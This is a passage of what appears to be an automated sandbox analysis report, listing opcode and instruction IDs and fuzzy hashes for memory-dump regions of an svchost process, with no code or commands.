                                                • Opcode Fuzzy Hash: 0bc85a5d6b5c71eb57af0a1e3d5930a17f5fc452298a005f0e80274d198f4f74
                                                • Instruction Fuzzy Hash: C1818E75A00709AFDB21CFA9C980AEEF7FAFB88344F14442AE455EB250D730AD45DB60
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 961af957aecc1f58b36449347d53a0a4596c3020dd933b1b6803ce10e0e60f88
                                                • Instruction ID: be6563652cba9969931ec7a8285d1b9dde2335a275badaf441bf53c949b5c4a9
                                                • Opcode Fuzzy Hash: 961af957aecc1f58b36449347d53a0a4596c3020dd933b1b6803ce10e0e60f88
                                                • Instruction Fuzzy Hash: 6071EDB6C01266AFDB25CF59C9907BEBBB4FF59700F15815AE842EB360D7709900CBA0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9dce0243f801cfd8d3e546f4da066e12b5fd28e11cf2e2dd7f25a8d7cfd55d89
                                                • Instruction ID: 1b50a3005f9564603b728089805cb6684cfa7d90e0c62c581a923bb966174aa3
                                                • Opcode Fuzzy Hash: 9dce0243f801cfd8d3e546f4da066e12b5fd28e11cf2e2dd7f25a8d7cfd55d89
                                                • Instruction Fuzzy Hash: 2071EF356046419FD311DF29C485B6AB7E5FF88310F0A89AAF898CF351DB38D946CBA1
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                • Instruction ID: 658979fea8a8c4bf489c64df67a9d1024b1d12563a15e889c66eac6aab488478
                                                • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                • Instruction Fuzzy Hash: 9F717C75E00619AFCB10DFA9C984EEEBBB8FF88300F154569E505EB250DB34EA45DB90
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7f83400c569c50e7396a60a7433fdff80bbe4ce018c326fd29d04f8460807c10
                                                • Instruction ID: e52b77e4d66bf35b16312950d16c000526c9f9498e08d37282f5a091a2dd50ee
                                                • Opcode Fuzzy Hash: 7f83400c569c50e7396a60a7433fdff80bbe4ce018c326fd29d04f8460807c10
                                                • Instruction Fuzzy Hash: 32710E36210B41AFDB21DF14CA44FAAB7B5EF40720F1D492CE656CB2A0DB74EA64DB50
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c681e5d6055cd47917bf305b1e8c5e4d89b171489ffc8c12718f1eb64aefb5ed
                                                • Instruction ID: 8c42b103fd496ddfa548e0b2fae1e74ed72c4b3a39ebee67dd9bd977eed2e264
                                                • Opcode Fuzzy Hash: c681e5d6055cd47917bf305b1e8c5e4d89b171489ffc8c12718f1eb64aefb5ed
                                                • Instruction Fuzzy Hash: F7817F75A00245DFCB09CFA9C490AAEBBF1FF88310F1981A9D859EB355D734EA51CB90
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 830682911b6ad9e61189aa78693a1be4c7dbcc517c1afecbe836c94766417b00
                                                • Instruction ID: ae6a1fc41fc7eae335b0b9777f8b7b124a036dff786db2aa7c4b6cfff32c3a2b
                                                • Opcode Fuzzy Hash: 830682911b6ad9e61189aa78693a1be4c7dbcc517c1afecbe836c94766417b00
                                                • Instruction Fuzzy Hash: C861FFB5600715AFDB95DF64C884BABFBA8FF88700F018619FA59CB240DB30E914DB91
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b35adfe82addcf18000aa9772f80622ff7ad1242d9719769081e98aae7292b58
                                                • Instruction ID: 60d7ab17819995ed07f82fe838ee6b143142f5eeddc89802095d2581199305fe
                                                • Opcode Fuzzy Hash: b35adfe82addcf18000aa9772f80622ff7ad1242d9719769081e98aae7292b58
                                                • Instruction Fuzzy Hash: 9A6162B5A00606EFDB18DF69C480AADFBB5FF49200F19856AD419EB340DB30AA41CBD0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 744c6e0de8740a2d9e3eb564fd7395f44801835d13e2168f1365ffbdb8626d6c
                                                • Instruction ID: aea789e0240190ad75caed53831568f959b380181d41a6e6abe2f8d5d895ed60
                                                • Opcode Fuzzy Hash: 744c6e0de8740a2d9e3eb564fd7395f44801835d13e2168f1365ffbdb8626d6c
                                                • Instruction Fuzzy Hash: 816114352047828FDB95CF69C494B6AF7E0BF90704F19046DEA85CF291DB31E90ACB91
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b4de1c27dcdf8468a95c3f59b6b5f95f4dcba853a4b9d05132afc3ea6dd7244f
                                                • Instruction ID: 7e6a9eafc19761bb3b39a8b7dccda1a837261996689a355fae96fe95a8056088
                                                • Opcode Fuzzy Hash: b4de1c27dcdf8468a95c3f59b6b5f95f4dcba853a4b9d05132afc3ea6dd7244f
                                                • Instruction Fuzzy Hash: 94415536600710AFCB26EF25D980F2ABBA9EF44720F1A8469E559CF350DB70DD018B90
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d03f02f6d44d0a4cab59860ba502d4488653ebed4e28bb30eb60ae30b06bee2d
                                                • Instruction ID: 91b14891027b8bdc55907ea65d7ac7b2f957f8d75f091cc2d6ddd41eca8a0a40
                                                • Opcode Fuzzy Hash: d03f02f6d44d0a4cab59860ba502d4488653ebed4e28bb30eb60ae30b06bee2d
                                                • Instruction Fuzzy Hash: AE51E27AA00695AFC711CF68C880669F7B0FF94710F0942A6E895DF740E734EAA1CBD0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0fe2982a10ab6a37fdab890f308137976e601d1c45722bb9da04f769e7e4b373
                                                • Instruction ID: de9135cb727a53ffda61da7843a96bf017a1eeb921f04ebe4752e8ca93ed58c6
                                                • Opcode Fuzzy Hash: 0fe2982a10ab6a37fdab890f308137976e601d1c45722bb9da04f769e7e4b373
                                                • Instruction Fuzzy Hash: CA513476A0060AEFEF15DF65C948BBDB7B4FF05310F19406AE416EB290DB74AA11DB80
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                • Instruction ID: ff66a1d087131cae517c15d4a15c8c5cc19a1b3dd20e3c180db31bd269979e3b
                                                • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                • Instruction Fuzzy Hash: 7C516C766087429FC351CF28C888B5ABBE5FBC8344F04892DFA95CB244D734E945CB52
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 568a3b965b6139aa3aedd4307f4bbfccac38b876fdcccbe8682e79eb69df304c
                                                • Instruction ID: 1c5fe0bb91c6be05f89034bbdc0ee3a33b4c90f2e8fc556f2164760e96ab21e7
                                                • Opcode Fuzzy Hash: 568a3b965b6139aa3aedd4307f4bbfccac38b876fdcccbe8682e79eb69df304c
                                                • Instruction Fuzzy Hash: 03519C75A05315DFEF21DBA9C844BEDB3B8BF0B714F190059E811EB241D7B5EA408BA2
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 72988ed75f5bc2699b9d1a56f4d462e9658c2be3bd2cd883b4164f1760be0aae
                                                • Instruction ID: 2f7a5007933fcb1b18d1eac62cf8b3c5b1b77c653eedaaa5491ecc3b33ad01d0
                                                • Opcode Fuzzy Hash: 72988ed75f5bc2699b9d1a56f4d462e9658c2be3bd2cd883b4164f1760be0aae
                                                • Instruction Fuzzy Hash: 74416A76D04229ABDF11DBA8D888AAFF7BCAF45654F060166E901FB200DA34DE4197E4
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a4d1b78fb49cd0d4b708b5dc39b6323922fb4dfcad0adff3cc68c5ae174e691c
                                                • Instruction ID: b4bfcafb7861ca1c765989d7af620dcc4ef8f6be05d8fe1838d777a12c79ed40
                                                • Opcode Fuzzy Hash: a4d1b78fb49cd0d4b708b5dc39b6323922fb4dfcad0adff3cc68c5ae174e691c
                                                • Instruction Fuzzy Hash: 4C41B076D05225DBCB14DF98C480AEDF7B4BF88714F19816AE816FB240D735AD42CBA4
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                • Instruction ID: 13d85d596556611af388a4b347e4fadf4862ad233baf7f9e2192c11fe9cbff8c
                                                • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                • Instruction Fuzzy Hash: 09512979A0061A9FCB14CF59C580AAEF7B6FF84714F2981A9D815EB350D730AA41CB90
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                • Instruction ID: 32df88b2f30a9ba8e9e3fe2c7d6e1c66515892c515aba0f231f883dff3483772
                                                • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                • Instruction Fuzzy Hash: CD512775A00606DFCB18CF69C4956A9FBF1FF48318B18816ED81ADB745D734EA90CB90
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 78dc211b4afcbb2aca5f84d145dbdfa6a566710a52b204db35211a52925e8983
                                                • Instruction ID: 94efeb148bf6818c9574c6bd282a08c3a29ba0d9ed82bba251c7d01670cc3372
                                                • Opcode Fuzzy Hash: 78dc211b4afcbb2aca5f84d145dbdfa6a566710a52b204db35211a52925e8983
                                                • Instruction Fuzzy Hash: 29511770904256EBDB25DB24CC44BE8BBB5EF12314F0A82E5D465DF2C0D779AA91DF80
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: edea00ccfce29e670dd91a98aa9d97d8b0cb35df61605ff060e91f839b4bdf3d
                                                • Instruction ID: 4b800d163ebb7c97696eff6b9113e64d04a05ba549d175602b036b54398da7bd
                                                • Opcode Fuzzy Hash: edea00ccfce29e670dd91a98aa9d97d8b0cb35df61605ff060e91f839b4bdf3d
                                                • Instruction Fuzzy Hash: 1041BBB5640311EFDB21EF65C880B2AFBA8EF50794F098469E511DF250D7B4EE40DBA0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                • Instruction ID: 87afa016f92e41f19f020d331f3f1d7ae4d5b37b62db79f05259b4bee6576b2f
                                                • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                • Instruction Fuzzy Hash: 24419575B00319AFDB55DF99CC85AAFB7BAAF84600F194069E604DB341D674DE01C760
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c5ec249b7a03e8b256e2a40fa546b563435fa0aa9f9194d12887772bb63aedd6
                                                • Instruction ID: f3226e2b3a216465035f7106eb3365ced294b44c9e0a5d9e35f6bd8e35b8f375
                                                • Opcode Fuzzy Hash: c5ec249b7a03e8b256e2a40fa546b563435fa0aa9f9194d12887772bb63aedd6
                                                • Instruction Fuzzy Hash: 2041E3765047009FD725EF25C894F2AB7A9EB65760F06052EFC15CF391CB30A841DB95
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                • Instruction ID: 01f51b06ce5402694c02a7119b4770a2731e69c35503e8d571ba23dd3f8231d2
                                                • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                • Instruction Fuzzy Hash: A8412E3DA00321EFDB20EF9588507BAFB72EB50759F1A806AE946DF240DA359F40D790
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                • Instruction ID: 65ed7ba5375eed8e0018d3f6f777fe57bf6e77fa3621d5002ec76568157f58be
                                                • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                • Instruction Fuzzy Hash: 8541F475A04715EFDB24CF99C9C0AAAB7F8FF18700B10496DE556EB690E730AA44CF90
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f25a961c4e85de9823927405a97c4498d2ff3ab25c9f4f3b92faa8c0e0090d9a
                                                • Instruction ID: 34aac23f4416db84a7a934515f484c0309b5a415bcc176aaa51e329bcc4f6756
                                                • Opcode Fuzzy Hash: f25a961c4e85de9823927405a97c4498d2ff3ab25c9f4f3b92faa8c0e0090d9a
                                                • Instruction Fuzzy Hash: 0C417D725083509FD760DF29C845B9BFBE8FF88664F004A2AF998DB251D770D904DB92
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                • Instruction ID: 69723517445f16f383a74be2c1615d633c7495c5cdbc174c30fe51ec29b1bee2
                                                • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                • Instruction Fuzzy Hash: 7E312132A04254AFDB21DB69CC84B9AFFE8FF05350F0985A6E855DB352D2749984CBA0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 55b57079b33b49d8b70833519f605c3ed174a8168218d1f63953daf98071d35a
                                                • Instruction ID: 0b3d975c52b84ad3d6942d9e1480b8b92e3cf693dbede22f90961ad3b0015fd2
                                                • Opcode Fuzzy Hash: 55b57079b33b49d8b70833519f605c3ed174a8168218d1f63953daf98071d35a
                                                • Instruction Fuzzy Hash: 1A317275A00328EFDB21DB24CC40B9AB7B9EF85750F1501D9B94DEB280DB309E84CB95
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3ade59bc65366507a5e3a61bf0edde49152f0196175c8f7aac98bcb9666c870
                                                • Instruction ID: c4dee1d2b099b953f59675eaed8a3ee6d9a5ecb573fd2084f980949f74673f9b
                                                • Opcode Fuzzy Hash: a3ade59bc65366507a5e3a61bf0edde49152f0196175c8f7aac98bcb9666c870
                                                • Instruction Fuzzy Hash: D431CD3A211B12EFDB51EB25CA84AA9F7A9FF46754F051065E801CBA50DB70E920DFD0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2c32a7dbad0d2af9421becf8cd0dde14fb2e9790ef2396a062ccd9dadac5f521
                                                • Instruction ID: 56a47383afe6274590ff3051e7245196c935a147bb33679fe4e9934f9ba9f9bc
                                                • Opcode Fuzzy Hash: 2c32a7dbad0d2af9421becf8cd0dde14fb2e9790ef2396a062ccd9dadac5f521
                                                • Instruction Fuzzy Hash: 2741CE35200B45DFDB26CF25C984FD6BBE9AB46714F06842AE999CF250C774F900CB90
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                • Instruction ID: 9b5684afc39ccde2d1123ff2c957110eb8d40840e370baea9958838bb2e53016
                                                • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                • Instruction Fuzzy Hash: C831F4317083419BDB21DA29C800767BA94AB86794F0D816AFC86CF2D0D676CDC1C796
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2a84df49c298d46af2af758528a3aeb99fba9d2d084c8cdc92915738f3fb6528
                                                • Instruction ID: 41592f9031f270a6bcd242a1449552cfd13616ee1053ca0dc2756759de82aba0
                                                • Opcode Fuzzy Hash: 2a84df49c298d46af2af758528a3aeb99fba9d2d084c8cdc92915738f3fb6528
                                                • Instruction Fuzzy Hash: 7B31AF7AA00259EFDB15DFA8C880BAEB7B9FB44B40F454169E900EF244D774ED50CBA4
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6b638bab807a094884ee9e7af241f042acee364541c007db0bef648aa3d6890e
                                                • Instruction ID: 695adb4fd2f627e68a37970dfad0537d252a498ccd7c513d3fd4f57e29423c96
                                                • Opcode Fuzzy Hash: 6b638bab807a094884ee9e7af241f042acee364541c007db0bef648aa3d6890e
                                                • Instruction Fuzzy Hash: 7621B07AA00B24AFC322EF698800B1ABFB5FB94B54F160469A955DF351DB70ED11CB90
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eecdfb3b06cf4a1321aed53c5f24e0b434d6ccb6d79ee886a6aaee5c01fd3e5a
                                                • Instruction ID: 13f19d8c4a546029ef02adba4c1623571a1b64b6510021f3d264fc3299a611f1
                                                • Opcode Fuzzy Hash: eecdfb3b06cf4a1321aed53c5f24e0b434d6ccb6d79ee886a6aaee5c01fd3e5a
                                                • Instruction Fuzzy Hash: 33312136B00315AFCB22EFA9CC50B6EBBB9AF44314F0180A9E641DF351DA31DD009B90
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b3d76755dbc9f7e92dc1254176536a83a337f55f7a88c515396c29b0dbabc789
                                                • Instruction ID: cfb8bb9d6942e45a222ea860ac5736488d293a5bff23c13a1c62c9a2ef47b1c1
                                                • Opcode Fuzzy Hash: b3d76755dbc9f7e92dc1254176536a83a337f55f7a88c515396c29b0dbabc789
                                                • Instruction Fuzzy Hash: 4031E337A04721DBC711EE288880E6BBBA5EF96664F064569FC56EB310DA30DC0197E2
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                • Instruction ID: 2f88eb226ff6ee1b6eb9a16f01632dfe66bc7d3a50df0c550d2af5ae14d8b29a
                                                • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                • Instruction Fuzzy Hash: CA310B3A600A14AFDB21DE54C888F2ABBB9DB90B51F1D8469ED26DF214D378DE40CB50
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: effb4c570d9ae1bb8851275f6e0ef8d72bbb12af454765a620e43f3bc7f3421c
                                                • Instruction ID: e19c2ae6e4dd8feb9bba837e4ee883c82f28a8f9245ddc39216c93497ce4fba1
                                                • Opcode Fuzzy Hash: effb4c570d9ae1bb8851275f6e0ef8d72bbb12af454765a620e43f3bc7f3421c
                                                • Instruction Fuzzy Hash: E631AE3A715A09FFDB51EB25DA44AA9BBA6FF86300F445066E901CBB50D731E930CBC1
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a7ace08162457ef1d1688df378132f1a424b8f415785b167d21276fd43c0b749
                                                • Instruction ID: 5ce891571dc98ddac613f3b2bdf130e431b4938c489665424d675ac60399bc73
                                                • Opcode Fuzzy Hash: a7ace08162457ef1d1688df378132f1a424b8f415785b167d21276fd43c0b749
